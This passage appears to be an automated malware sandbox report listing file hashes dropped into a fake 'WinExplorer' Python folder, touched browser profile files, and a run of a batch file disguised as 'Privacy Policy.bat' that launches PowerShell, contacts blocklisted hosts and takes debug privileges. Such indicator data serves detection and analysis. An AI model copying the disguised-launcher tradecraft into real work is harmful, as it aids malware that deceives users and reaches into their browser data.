SHA512 a5b2bcf2fac0a3072937438f24ed7942954cad68a00d345f8bcadd5cf1f4ff3efb0e4eb7970f78c9b702b35a7e34d3a0cc684c43d0c6795875e9f88b3f64a469

C:\WinExplorer\Lib\test\cjkencodings\shift_jis-utf8.txt

MD5 cc34bcc252d8014250b2fbc0a7880ead
SHA1 89a79425e089c311137adcdcf0a11dfa9d8a4e58
SHA256 a6bbfb8ecb911d13581f7713391f8c0ceea1edd41537fdb300bbb4d62dd72e9b
SHA512 c6fb4a793870993a9f1310ce59697397e5334dbb92031ab49a3ecc33c55e84737e626e815754c5ddbe7835b15d3817bf07d2b4c80ea5fd956792b4db96c18c2f

C:\WinExplorer\Lib\test\test_importlib\builtin\__main__.py

MD5 47878c074f37661118db4f3525b2b6cb
SHA1 9671e2ef6e3d9fa96e7450bcee03300f8d395533
SHA256 b4dc0b48d375647bcfab52d235abf7968daf57b6bbdf325766f31ce7752d7216
SHA512 13c626ada191848c31321c74eb7f0f1fde5445a82d34282d69e2b086ba6b539d8632c82bba61ff52185f75fec2514dad66139309835e53f5b09a3c5a2ebecff5

C:\WinExplorer\Lib\test\test_importlib\extension\__init__.py

MD5 c3239b95575b0ad63408b8e633f9334d
SHA1 7dbb42dfa3ca934fb86b8e0e2268b6b793cbccdc
SHA256 6546a8ef1019da695edeca7c68103a1a8e746d88b89faf7d5297a60753fd1225
SHA512 5685131ad55f43ab73afccbef69652d03bb64e6135beb476bc987f316afe0198157507203b9846728bc7ea25bc88f040e7d2cb557c9480bac72f519d6ba90b25

C:\WinExplorer\Lib\test\test_importlib\namespacedata01\binary.file

MD5 37b59afd592725f9305e484a5d7f5168
SHA1 a02a05b025b928c039cf1ae7e8ee04e7c190c0db
SHA256 054edec1d0211f624fed0cbca9d4f9400b0e491c43742af2c5b0abebf0c990d8
SHA512 4ec54b09e2b209ddb9a678522bb451740c513f488cb27a0883630718571745141920036aebdb78c0b4cd783a4a6eecc937a40c6104e427512d709a634b412f60

C:\WinExplorer\python.exe

MD5 98eea111050b063ba63c6086ed7d4723
SHA1 25cd896907cc56e03af7e2704679fc4cee2b0ff9
SHA256 a8c0b8b5a892198aef71fa68d0a0eb88d3e8d5c541ad6a1ecf5baa0bc95fc403
SHA512 41fc40864664c15bd8d6b1414bee1b79933c8f5a71e67e872c47b185e60ecf7d003613bf44de6d68c70a86e7a59620be6afa90850228dc251c5f61c91d017cd0

C:\WinExplorer\VCRUNTIME140.dll

MD5 1a84957b6e681fca057160cd04e26b27
SHA1 8d7e4c98d1ec858db26a3540baaaa9bbf96b5bfe
SHA256 9faeaa45e8cc986af56f28350b38238b03c01c355e9564b849604b8d690919c5
SHA512 5f54c9e87f2510c56f3cf2ceeb5b5ad7711abd9f85a1ff84e74dd82d15181505e7e5428eae6ff823f1190964eb0a82a569273a4562ec4131cecfa00a9d0d02aa

C:\WinExplorer\python310.dll

MD5 73cadab187ad5e06bef954190478e3aa
SHA1 18ab7b6fe86193df108a5a09e504230892de453e
SHA256 b4893ed4890874d0466fca49960d765dd4c2d3948a47d69584f5cc51bbbfa4c9
SHA512 b2ebe575f3252ff7abebab23fc0572fc8586e80d902d5a731fb7bd030faa47d124240012e92ffe41a841fa2a65c7fb110af7fb9ab6e430395a80e925283e2d4d

memory/3092-11717-0x00007FFECECA0000-0x00007FFECF761000-memory.dmp

C:\WinExplorer\lib\encodings\__pycache__\aliases.cpython-310.pyc

MD5 2785f59b0ecd71e538dbf39a3d8a1db6
SHA1 8084d50bed59dd7dc6ed4157b71298c9e8f1f075
SHA256 31de0ed78633201413febf31e2cd9957b38696dfdb07951d8837ec6101ee4457
SHA512 cd075e8dfb6b5f7bc265ef49831c90ed80e8f81722892df8bea057e47b86ff69cd15b29dbfeceb6872847b1065b7b35e21336ac0c3e9d337d8deeed8d0e3dcbe

C:\WinExplorer\lib\__pycache__\abc.cpython-310.pyc

MD5 dd121ee586d571c8450b3f29b8945d57
SHA1 d6e5c7aeaeffed81c8b40138299109584ce9007d
SHA256 87a7d8741808e69e689aecf0a6e1a62885e808ebb831f61d1623fb3b4028a4da
SHA512 454d71b2dcd9ad036ed92561e9c3e74d6f7b411c193a7eb4d58fa50ec0af07aa29742f77fe956efb139b348a4094d69fab0c77e27aded7bab6cc8f968d8a7d3e

C:\WinExplorer\lib\__pycache__\stat.cpython-310.pyc

MD5 f309fd05885f7a8d307bc607666e29bc
SHA1 be70a6351f6119a59074880e6447eabf8df741c5
SHA256 f97557d526eac33bf59cbdbe708f055b686f35db721db174ad1ff81b9da7b477
SHA512 ee9fbe6aa18eeb10aa97e7645a7f7081e6f690192a2bd3163b798de1104664a1e1138b028c8293c045a03dd6ed9735c4f99f8b6c4d4bbd0f0fea3afca34e8a41

C:\WinExplorer\lib\__pycache__\types.cpython-310.pyc

MD5 2d99472eeb6d03f66827b833412465d9
SHA1 621c795de49f6d7a86aeaa68ee5351d9b7378726
SHA256 f985d1f979d5c09dee9f6981ae51d6f784a86739f6bb31e295882d536303c898
SHA512 26baedbccf9f10d080897ce9aa3db4de0a552f82527f996214b69eb9674a069087fb2bd07640a6349618a19b9ddb058e18bd2418ff01a0c567668bb49c74922a

C:\WinExplorer\lib\__pycache__\enum.cpython-310.pyc

MD5 f67e908dea3ac0c8d38d28e4321f0ce2
SHA1 9a344d2138f6eb9edd2a6d175e9171d41b9ed79a
SHA256 86688baf3ee821608fa7a3abe1597f8544f0261a961243d399bb33064a26b5dd
SHA512 7fc3a915ee6b2bc1a8ab3996976097d6cba8757e0a898630a0244d3bec2b40950763fb0c4c37094db550306e4bdd927c488969b02349fda4d6d189924372cea3

C:\WinExplorer\lib\sre_constants.py

MD5 bca79743254aa4bc94dace167a8b0871
SHA1 d1da34fbe097f054c773ff8040d2e3852c3d77f1
SHA256 513373cde5987d794dc429f7c71a550fe49e274bf82d0856bec40dca4079dadc
SHA512 1c0ab3ce7b24acd2ffbd39a9d4bf343aa670525465b265a6572bdec2036b1a72aaafe07afe63a21246456427f10be519aeee9fc707cbb0151ac1e180239ad2af

C:\WinExplorer\lib\__pycache__\sre_parse.cpython-310.pyc

MD5 ae52c0848bda7c5a3c99d5594220a040
SHA1 3e12116e5296c3363896d564bcff8e0a37fd4328
SHA256 2da80b594bdb3d6621b3dd9bc4a85482788d62eb73d05968d007daec4346000d
SHA512 dcc357dc201c18465cb5ad25f018c0ee1ad18952757f5de33e4385dc243e3033f98bd3908cba08bf06ad323cd899e5479fed96ba6eede8dca987d9492393afff

C:\WinExplorer\lib\sre_parse.py

MD5 d1af43b8e4f286625a0144373cf0de28
SHA1 7fbd019519c5223d67311e51150595022d95fe86
SHA256 c029a310e36013abc15610ff09a1e31d9fb1a0e4c60293150722c08fc9e7b090
SHA512 75ab3b5a2aad2ac44ab63028982a94bb718aaf6c67f6b59a8edc8c2c49287dd16667923e1889c68404053d61df742864a6e85545bbfb17624a5844bb049767f9

C:\WinExplorer\lib\__pycache__\sre_compile.cpython-310.pyc

MD5 26391239122a61845819ae498cfb5ede
SHA1 745b887f93a9a7805daf8cb604cba7713584bc60
SHA256 6b61e840165345e81f5e1f2f99f9bc9739c0ee610d79c2f7ea0a9949f023390d
SHA512 757f78dc76e9ca02c40f81a17d91e1af616b0ca48ac26eceb683eb9dbf74ec12a71321b04f1d4777aafdc4f3be13c9cf8c7248e5ff7ed22cda2ea708726a2971

C:\WinExplorer\lib\sre_compile.py

MD5 f09eb9e5e797b7b1b4907818fef9b165
SHA1 8f9e2bc760c7a2245cae4628caecdf1ada35f46d
SHA256 cdb9bdcab7a6fa98f45ef47d3745ac86725a89c5baf80771f0451d90058a21d6
SHA512 e71fb7b290bb46aee4237dbf7ff4adc2f4491b1fc1c48bd414f5ce376d818564fd37b6113997a630393d9342179fcb7ce0462d6aad5115e944f8c0ccab1fa503

C:\WinExplorer\vcruntime140.py

MD5 17e00956b68f74a69588e5d06207c8b0
SHA1 d3582061eff2d6d54456d7484a5ee026f58f9a76
SHA256 ffa54eb3b5015f2e6107191a6f8f27b2dcd9aeda7484e283f6ef0ddab6e8e0b4
SHA512 83675ca4e464b4996624feb8a55fcc2d3b0eaabb7e50725f541dfd289b0439e9d6912b3622ccd744f00c3a2dd568e06fcd4d832b0e00994c669e111b0ad86d7f

C:\WinExplorer\lib\enum.py

MD5 f87cac79ab835bac55991134e9c64a35
SHA1 63d509bf705342a967cdd1af116fe2e18cd9346f
SHA256 303afea74d4a1675a48c6a8d7c4764da68dbef1092dc440e4bf3c901f8155609
SHA512 9a087073e285f0f19ab210eceefb9e2284fffd87c273413e66575491023a8dcb4295b7c25388f1c2e8e16a74d3b3bff13ec725be75dc827541e68364e3a95a6d

C:\WinExplorer\lib\__pycache__\re.cpython-310.pyc

MD5 b86df6b312122b3fce09665494782806
SHA1 6a5f8ef6811cdda12caa09abb79e609c75a0d181
SHA256 15f33f641c1aa969466e7aece1af4bb17b44b79c1c46de0cb32f2b3ee2fb3f07
SHA512 8d72218197529dda95e2dbce0d2791ca9369264a6cab3efb9fc0a7db2432f04bda870013d2a984ab70dec908d657adc53d9d36c58c55808812e146a098f45f8f

C:\WinExplorer\lib\re.py

MD5 f04d4a880157a5a39bbafc0073b8b222
SHA1 92515b53ee029b88b517c1f2f26f6d022561f9b4
SHA256 5ae8929f8c0fb9a0f31520d0a909e5637d86c6debb7c0b8cbacc710c721f9f7d
SHA512 556aaacfc4237b8ab611922e2052407a6be98a7fb6e36e8d3ed14412b22e50abac617477f53acfa99dba1824b379c86376991739d68749eb5f162e020e7999cb

C:\WinExplorer\lib\json\__pycache__\decoder.cpython-310.pyc

MD5 af1cd5fb55a04542a471e9b72a8b8a8a
SHA1 b80d43d01150f353fa897f15b7cb7873219af46b
SHA256 e5427a0a8cc5d271085d19ca99e977331bbc48dba2371a0dbf7c0062fb5a898b
SHA512 2831b20aa6dfbde8b858f3f628d8a791bb956df0b6ca07255fce9734dc0ebf85d6044da08fd2874418b82149a4324dd4c53f2ac097ee1d0e11f290e9116435d0

C:\WinExplorer\lib\json\decoder.py

MD5 5cca52d21fdd03ebc838040b3b3448a0
SHA1 26ea25ab90b1d325ae65d492944e3757c0a1a4d6
SHA256 b719fbcfcebd2b174f076e71292e22b1a17d9e258dbe896c768325383bad4f80
SHA512 e21f1f5ef9821dc49a71552d8e3e42db1d1817a9567c10aea7764b3143630105570bcbf41a63aee58b65ed7ac13c77afc2a16cb46dc236f3529a95d755150d66

C:\WinExplorer\lib\json\__pycache__\__init__.cpython-310.pyc

MD5 c9f831ea0702ed96ed723add4b811e9c
SHA1 63a9236582cd4269528606395bc1f7178a66b117
SHA256 bbdf0dae08f5241607f05d3ab895b73bfd314fcdc8034f64777a041e569a3e58
SHA512 7fd7fb0c800c9ae384e8d4a18d5a6b78f039a965dac46d4d7a879e6ae39924cc503aca4de8a535811368dfefabc9fac86c14fb1c562c6c6e84473124007a9641

C:\WinExplorer\lib\json\__init__.py

MD5 db4a220a79a5f826ef36359ed1c50c28
SHA1 1774dc6339a61957aa38ab6a6a25ab6a0b1d9de4
SHA256 feb17670e443e5db2723f217727dcc5d5e155c40e4e6935b16061c88542f24e7
SHA512 3a51e599669d4afc7339ef06c7a3c9889718ee525f019f044672f2a1c7de6bf98f581af54b138d0573d2cc9cf660ddbdf81db9c4516a125f49be4a147f2f09b6

C:\WinExplorer\vcruntime140d.py

MD5 051cd26e1c2da433569764c139fe9a97
SHA1 6ab160775b54f3aaa04467f62c271b170faa1361
SHA256 9db640e546d905ec286f2a22ccc04a0e9ff2600aa958c5a64ea450dbf5531504
SHA512 7a90423508070fdfad1b86d153e73c431d660c182d2d47f7cec84e32fd3cbde5682b33b59ff7a4778a0207b1cdad6eac34ef59ea77b5189cb8b24f5df259dcdd

C:\WinExplorer\lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc

MD5 298391ebf4c22b6ffea67c0f03214bcf
SHA1 f93765c13c21cb81f64f029cc6be37f60603616c
SHA256 6834c2bd4810acd0fcb5bdc6ff5af5ab3631d7cc84aab172beb90de4eb1e04e6
SHA512 f90cd51f1602f7a94e7a988c3868e3ee932216084a2347e9d2ca86b655033251a676b47c4342b8e8598e146b58ac38f038fe695a98730b473e30db7276139497

C:\WinExplorer\lib\site-packages\win32\lib\pywin32_bootstrap.py

MD5 804dc794e796198af106c20088ab4138
SHA1 004a0f93f15a40f8ed3a5def6c6634937c48836f
SHA256 5b7a20a3b71615e1d08fdd9b91125ca615295457be54a77713705874772ac289
SHA512 00e1033241d3b2843be8a34f89d1f225dbd9f325f7fcee07e64dcf11dd8aab094cf7fb2deaa7ee5dcf3d3285ff54a7aacad88b086655b99f9162d1f653de4a22

C:\WinExplorer\lib\site-packages\pywin32.pth

MD5 71dc3efaad85e1fd19058e20e083c74f
SHA1 bd05ad717c31dfe5c19e0d35e43667ac84d47655
SHA256 d902584a2a0a5216ce12c712d1378fe07541d32c383d0cc5abcd68412144fe4d
SHA512 9778e9d60038e42927946634e61570587115032c8df026cf2b7a54436f5618369e4b01b4dcf1b4711aab62f38abc82bb65fc13ca6dab5d33b154eb5ea5e5093f

C:\WinExplorer\lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc

MD5 bc3d8ef20d3be1df3e4f886361491d71
SHA1 a8fcfb196c403685ec40c16de34b740d34dd891e
SHA256 41e8087df8aed24a55ba7fceb168c78e3662bf5ba3f4f7dd003db05b9edabc4c
SHA512 bcb2da98b795c41d37d66c0ef043c255aae3189b4c002f779ba00f92ec5168caefbe397294475dae645affd8274ce7ffdbcd38c48304a98ab66b2cd01c5c1371

C:\WinExplorer\lib\site-packages\_distutils_hack\__init__.py

MD5 128079c84580147fd04e7e070340cb16
SHA1 9bd1ae6606ccd247f80960abbc7d7f78aeec4b86
SHA256 4d27a48545b57dd137ae35376fcf326d2064271084a487960686f8704b94de4a
SHA512 cf9d54474347d15ad1b8b89b2e58b850ad3595eec54173745bde86f94f75b39634be195a3aef69d71cb709ecff79c572a66b1458a86fa2779f043a83a5d4cc4c

C:\WinExplorer\lib\site-packages\distutils-precedence.pth

MD5 18d27e199b0d26ef9b718ce7ff5a8927
SHA1 ea9c9bfc82ad47e828f508742d7296e69d2226e4
SHA256 2638ce9e2500e572a5e0de7faed6661eb569d1b696fcba07b0dd223da5f5d224
SHA512 b8504949f3ddf0089164b0296e8371d7dcdd4c3761fb17478994f5e6943966528a45a226eba2d5286b9c799f0eb8c99bd20cbd8603a362532b3a65dd058fa42e

C:\WinExplorer\lib\__pycache__\_sitebuiltins.cpython-310.pyc

MD5 1d857fde4f48feb63cd9928e173ee665
SHA1 2e651afe26129b5752d1946cbedcb16c4698057e
SHA256 be955c26fc209997d7e4c6068b7f5e9b85e135354e5f5e67bd901e2f65294d1a
SHA512 a09632d02ee89b23daf49513de7d3cbd37e44f31bb2effd325ea48c7d964df79dd2a68a7d8d009e3c0252a5be65a9e86e3da3493b2e31915880cf26e1195c58d

C:\WinExplorer\lib\_sitebuiltins.py

MD5 2e95aaf9bd176b03867862b6dc08626a
SHA1 3afa2761119af29519dc3dad3d6c1a5abca67108
SHA256 924f95fd516ecaea9c9af540dc0796fb15ec17d8c42b59b90cf57cfe15962e2e
SHA512 080495fb15e7c658094cfe262a8bd884c30580fd6e80839d15873f27be675247e2e8aec603d39b614591a01ed49f5a07dd2ace46181f14b650c5e9ec9bb5c292

C:\WinExplorer\lib\__pycache__\genericpath.cpython-310.pyc

MD5 12319160d0f791d3c53950405549dc58
SHA1 231c9d91fc2bb0d9926097b468f94ce7b10f57e7
SHA256 bf0c2fdad80b369422a872791c682bd324650b457d571f0cdc24fc591b47dd97
SHA512 33b284acaaeb250a3305ba33f82418ea4e4dafa7f13eddda227aaea07603dbd201677e4d650dbaa07fd4d6d4b36b9227077fbd9976b474a3673fcb7dab479478

C:\WinExplorer\lib\genericpath.py

MD5 5ad610407613defb331290ee02154c42
SHA1 3ff9028bdf7346385607b5a3235f5ff703bcf207
SHA256 2e162781cd02127606f3f221fcaa19c183672d1d3e20fdb83fe9950ab5024244
SHA512 9a742c168a6c708a06f4307abcb92cede02400bf53a004669b08bd3757d8db7c660934474ec379c0464e17ffd25310dbab525b6991cf493e97dcd49c4038f9b7

C:\WinExplorer\lib\types.py

MD5 c58c7a4ee7e383be91cd75264d67b13b
SHA1 60914b6f1022249cd5d0cf8caa7adb4dcf34c9ea
SHA256 0d3a1a2f8f0e286ad9eadbb397af0c2dc4bef0c71a7ebe4b51ded9862a301b01
SHA512 9450e434c0d4abb93fa4ca2049626c05f65d4fb796d17ac5e504b8ec086abec00dcdc54319c1097d20e6e1eec82529993482e37a0bf9675328421f1fa073bf04

C:\WinExplorer\lib\__pycache__\ntpath.cpython-310.pyc

MD5 7c5f38e87d5b5dc0101b5cdeec3a0238
SHA1 2c3f6d8b1a0207bda59aa3e868d8f077f92fb885
SHA256 0cd05d2b51e16d5e8e0e4c8f765b6bf32c7b6dcc75922d44e58575de76573ec7
SHA512 52a3e7662baf230880f82fa527b673ce879c6fadffcc564911c7b9fceed37e5c23b01db1aa7b448ea238767f9b5c1cc26127a38d93dbee1dced6b2826de22818

C:\WinExplorer\lib\ntpath.py

MD5 7d31906afdc5e38f5f63bfeeb41e2ef2
SHA1 bbefd95b28bac9e58e1f1201ae2b39bbe9c17e5f
SHA256 e34494af36d8b596c98759453262d2778a893daa766f96e1bb1ef89d8b387812
SHA512 641b6b2171bb9aae3603be2cbcc7dd7d45968afeb7e0a9d65c914981957ba51b2a1b7d4d9c6aec88cf92863844761accdeca62db62a13d2bc979e5279d7f87a0

C:\WinExplorer\lib\__pycache__\_collections_abc.cpython-310.pyc

MD5 232ffab0a078b435363dcc16c3b4385f
SHA1 2c9e12034dd3fe4371a752fc523cf586b3935687
SHA256 7ed4b9efdf3e9c51c3baa0b16ff4543989a6d879c36bceb0f94a2c2fbcb60f00
SHA512 04bb5c8649c1bf3269dc77dd571ce56d57de192a22ae2b8cb0c8d06b6ea6beca99df49283039d160498baaec8ba67b6422169b82e7b20aa497d3a5a865f89ad9

C:\WinExplorer\lib\_collections_abc.py

MD5 faa0e5d517cf78b567a197cb397b7efc
SHA1 2d96f3e00ab19484ff2487c5a8b59dfe56a1c3ac
SHA256 266ccceb862ea94e2b74fdda4835f8ef149d95c0fc3aafe12122d0927e686dd3
SHA512 295601f6a33dd0e9c38b5756bfa77c79402e493362fb7f167b98a12208bac765101e91a66398d658e1673b7624c8d1a27f6e12ec32fef22df650b64e7728ca8d

C:\WinExplorer\lib\stat.py

MD5 7a7143cbe739708ce5868f02cd7de262
SHA1 e915795b49b849e748cdbd8667c9c89fcdff7baf
SHA256 e514fd41e2933dd1f06be315fb42a62e67b33d04571435a4815a18f490e0f6ce
SHA512 7ecf6ac740b734d26d256fde2608375143c65608934aa51df7af34a1ee22603a790adc5b3d67d6944ba40f6f41064fa4d6957e000de441d99203755820e34d53

C:\WinExplorer\lib\__pycache__\os.cpython-310.pyc

MD5 b613041e0f7d5787002fb7515775688d
SHA1 03a3c90682f68694175aafbb7ea97c01996e4c0e
SHA256 074a64e009132c864cdd079a0af7df578c0222198c32a45d76e9ebae094f64f6
SHA512 959f9ac73b80bf7fb9a475a14ba2f75569c331a51d53b364325f038898811bb00573f0a6ea9cff7a58ca2f21dac18217a62c18e96d462c91b82bb461c1474758

C:\WinExplorer\lib\os.py

MD5 8180e937086a657d6b15418ff4215c35
SHA1 232e8f00eed28be655704eccdab3e84d66cc8f53
SHA256 521f714dc038e0faa53e7de3dbccae0631d96a4d2d655f88b970bd8cf29ec750
SHA512 a682a8f878791510a27de3a0e407889d3f37855fb699320b4355b48cb23de69b89dadd77fdcca33ef8e5855278e584b8e7947b626d6623c27521d87eae5a30d5

C:\WinExplorer\lib\__pycache__\site.cpython-310.pyc

MD5 ebd814d61d2872ba538064ba6c60013a
SHA1 4b4a321ac2583126d8f9064df8bb3c5f3415d0d4
SHA256 aa4a8b5d853be58edf6f896274d98b4c1fc69f79d307d57504b30d755ed20305
SHA512 084f091b3297b42b0bd792b224df79abf6ebb629bda76a63f1cec5c09b7d08bc81b151e5671c3b6492c72e14404a2652982d81e11b8b80a0c8e20bb8d547b609

C:\WinExplorer\lib\site.py

MD5 23cf5b302f557f7461555a35a0dc8c15
SHA1 50daac7d361ced925b7fd331f46a3811b2d81238
SHA256 73607e7b809237d5857b98e2e9d503455b33493cde1a03e3899aa16f00502d36
SHA512 e3d8449a8c29931433dfb058ab21db173b7aed8855871e909218da0c36beb36a75d2088a2d6dd849ec3e66532659fdf219de00184b2651c77392994c5692d86b

C:\WinExplorer\lib\abc.py

MD5 3a8e484dc1f9324075f1e574d7600334
SHA1 d70e189ba3a4cf9bea21a1bbc844479088bbd3a0
SHA256 a63de23d93b7cc096ae5df79032dc2e12778b134bb14f7f40ac9a1f77f102577
SHA512 2c238b25dd1111ee37a3d7bf71022fe8e6c1d7ece86b6bbdfa33ee0a3f2a730590fe4ba86cc88f4194d60f419f0fef09776e5eca1c473d3f6727249876f00441

C:\WinExplorer\lib\__pycache__\io.cpython-310.pyc

MD5 52063ea5cbc2481194033f1197970509
SHA1 fc3b24e16fc6a222c554d8a144d02205c13ce8b9
SHA256 12cc19455d5c6f6d074b081f98a18b6c35b1d4791a4e5ad3fafec5b7545fd2b3
SHA512 de217d6ca9c069a6cdbe6628dd07bae852b287443ba618d784ede6f06a0425cc6a9c81116efec02b59685a068ae6003275ccafbfca76a43fb5e948edf4802b3f

C:\WinExplorer\lib\io.py

MD5 99710b1a7d4045b9334f8fc11b084a40
SHA1 7032facde0106f7657f25fb1a80c3292f84ec394
SHA256 fe91b067fd544381fcd4f3df53272c8c40885c1811ac2165fd6686623261bc5d
SHA512 ac1b4562ed507bcccc2bdfd8cab6872a37c081be4d5398ba1471d84498c322dcaa176eb1dda23daaddd4cebfcd820b319ddcb33c3972ebf34b32393ad8bd0412

C:\WinExplorer\lib\encodings\__pycache__\cp1252.cpython-310.pyc

MD5 82ee98c7012f54ee2944e197c96954ce
SHA1 ebd071a551281d75ec5d08646727c0a9c6e2e195
SHA256 aad618cf5533c27247fa672e749f5a4696923e2b86d798e0fe6b94e13c27281c
SHA512 f98d09d5ec5304b8ba6ed69b39160cff42845509fa7f648e01999c2faa2abd3b5776d4018718ac2ad4167272b66ee4ec8f83242a578710cda120fc122025f68c

C:\WinExplorer\lib\encodings\cp1252.py

MD5 52084150c6d8fc16c8956388cdbe0868
SHA1 368f060285ea704a9dc552f2fc88f7338e8017f2
SHA256 7acb7b80c29d9ffda0fe79540509439537216df3a259973d54e1fb23c34e7519
SHA512 77e7921f48c9a361a67bae80b9eec4790b8df51e6aff5c13704035a2a7f33316f119478ac526c2fdebb9ef30c0d7898aea878e3dba65f386d6e2c67fe61845b4

C:\WinExplorer\lib\encodings\__pycache__\utf_8.cpython-310.pyc

MD5 a23fff308df35b79582c2ae72cac966b
SHA1 af1bbf32ee1b83fcf6aaeb83dc0101250fac12c6
SHA256 05a63b2078bec4f94474b34322b33961dde05f78ed9afdb84f30e125d515733e
SHA512 c9b23618dbab4eb6b58d8071391bd145bc99f626df3d74d7406e37a0994fcd5327adac71f71bc52adee4a92635ee5b65e13e05c3001c74203565c591182a3dc4

C:\WinExplorer\lib\encodings\utf_8.py

MD5 f932d95afcaea5fdc12e72d25565f948
SHA1 2685d94ba1536b7870b7172c06fe72cf749b4d29
SHA256 9c54c7db8ce0722ca4ddb5f45d4e170357e37991afb3fcdc091721bf6c09257e
SHA512 a10035ae10b963d2183d31c72ff681a21ed9e255dda22624cbaf8dbed5afbde7be05bb719b07573de9275d8b4793d2f4aef0c0c8346203eea606bb818a02cab6

C:\WinExplorer\lib\encodings\aliases.py

MD5 ff23f6bb45e7b769787b0619b27bc245
SHA1 60172e8c464711cf890bc8a4feccff35aa3de17a
SHA256 1893cfb597bc5eafd38ef03ac85d8874620112514eb42660408811929cc0d6f8
SHA512 ea6b685a859ef2fcd47b8473f43037341049b8ba3eea01d763e2304a2c2adddb01008b58c14b4274d9af8a07f686cd337de25afeb9a252a426d85d3b7d661ef9

C:\WinExplorer\lib\__pycache__\codecs.cpython-310.pyc

MD5 80b9521754e63cde4e4889290f40775c
SHA1 aa7b23329d95b3f0e344e79ebb371be68bcf57fc
SHA256 0e49e81512423f7635c6ee14a949304522a46d80519790b4920ea76a652e5f68
SHA512 d95a53b312fe830e21ccca945b3cb4631ddf16e14ee51b409f74c05cd78f602dcb1b034c2abe3b853c22ac3029b68ac45347cecab4de20b4c2b4b04c5dabea95

C:\WinExplorer\lib\codecs.py

MD5 8e0d20f2225ead7947c73c0501010b0e
SHA1 9012e38b8c51213b943e33b8a4228b6b9effc8bc
SHA256 4635485d9d964c57317126894adaca91a027e017aefd8021797b05415e43dbb4
SHA512 d95b672d4be4ca904521c371da4255d9491c9fc4d062eb6cf64ef0ab9cd4207c319bbd5caabe7adb2aaaa5342dee74e3d67c9ea7d2fe55cb1b85df11ee7e3cd3

C:\WinExplorer\lib\encodings\__pycache__\__init__.cpython-310.pyc

MD5 f650d0257ae1c5cc165e65879d283f59
SHA1 b156a2c6e24f864e660f9821a2e8c636d76e7727
SHA256 62aaf2cb350580b7f15d6a852495197eb7bb3e87d656de91bfcf7b75d791a430
SHA512 0a277d313266d9cb46b136d654c08090976ba80fbbfe2a809e77c6f5ebeca4e61203a74ffe87a9137e2ad0f53da15285fef8f5644113daf14291fefbe9c2d789

C:\WinExplorer\lib\encodings\__init__.py

MD5 7e6a62ef920ccbbc78acc236fdf027b5
SHA1 816afc9ea3c9943e6a7e2fae6351530c2956f349
SHA256 93cfd89699b7f800d6ccfb93266da4db6298bd73887956148d1345d5ca6742a9
SHA512 c883b506aacd94863a0dd8c890cbf7d6b1e493d1a9af9cdf912c047b1ca98691cfd910887961dd94825841b0fe9dadd3ab4e7866e26e10bfbbae1a2714a8f983

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c2d9eeb3fdd75834f0ac3f9767de8d6f
SHA1 4d16a7e82190f8490a00008bd53d85fb92e379b0
SHA256 1e5efb5f1d78a4cc269cb116307e9d767fc5ad8a18e6cf95c81c61d7b1da5c66
SHA512 d92f995f9e096ecc0a7b8b4aca336aeef0e7b919fe7fe008169f0b87da84d018971ba5728141557d42a0fc562a25191bd85e0d7354c401b09e8b62cdc44b6dcd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 e55832d7cd7e868a2c087c4c73678018
SHA1 ed7a2f6d6437e907218ffba9128802eaf414a0eb
SHA256 a4d7777b980ec53de3a70aca8fb25b77e9b53187e7d2f0fa1a729ee9a35da574
SHA512 897fdebf1a9269a1bf1e3a791f6ee9ab7c24c9d75eeff65ac9599764e1c8585784e1837ba5321d90af0b004af121b2206081a6fb1b1ad571a0051ee33d3f5c5f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 9c4702c66af713f893106af041a598d8
SHA1 b7e564530c083539b33a019376e81f896e23ea02
SHA256 97659b2795cdfade6cc06668eeb7cc204b04cc042900bfec5394d15660621243
SHA512 3440499914865a59b740185fc38f185ad0bb16476510cf38d4493ae1519f44c76f23ddbaa414fead2e01f67fe8a0d25b1695b780f4f0f8628b23efbfbec502b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 19:55

Reported

2024-11-05 19:58

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Privacy Policy.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

